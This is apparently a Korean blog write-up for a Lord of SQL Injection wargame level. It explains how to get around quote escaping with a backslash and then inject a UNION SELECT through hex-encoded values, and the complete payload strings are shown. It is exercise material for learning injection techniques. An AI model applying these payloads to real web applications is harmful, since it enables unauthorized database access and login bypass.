싱글쿼터 우회 할려고 \를 넣고 id값에 hex를 넣어주었다.
근데 아무 반응이 없다.
코드를 보면 쿼리2가 존재한다. 테이블이 2개 존재하는 것 같다.
union을 이용해 쿼리2를 넣어보았다.
?id=# and pw= union select 1,2%23
query 2를 이제 id값에 \ pw값이 union select admin#을 넣는데 admin을 hex로 변환해
query2 : id='\' and pw='union select 0x61646d696e#' 이렇게 들어가게 넣어주자
\ hex변환 : 0x5c
union select 0x61646d696e# hex 변환 : 0x756e696f6e2073656c6563742030783631363436643639366523
id=\andpw= union select 0x5c, 0x756e696f6e2073656c6563742030783631363436643639366523
헥사 코드 변환 사이트
'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글
| [Lord of SQL Injection] 27번 blue_dragon (0) | 2021.01.23 |
|---|---|
| [Lord of SQL Injection] 26번 red_dragon (0) | 2021.01.23 |
| [Lord of SQL Injection] 24번 evil_wizard (0) | 2021.01.23 |
| [Lord of SQL Injection] 23번 hell_fire (0) | 2021.01.23 |
| [Lord of SQL Injection] 22번 dark_eyes (0) | 2021.01.22 |
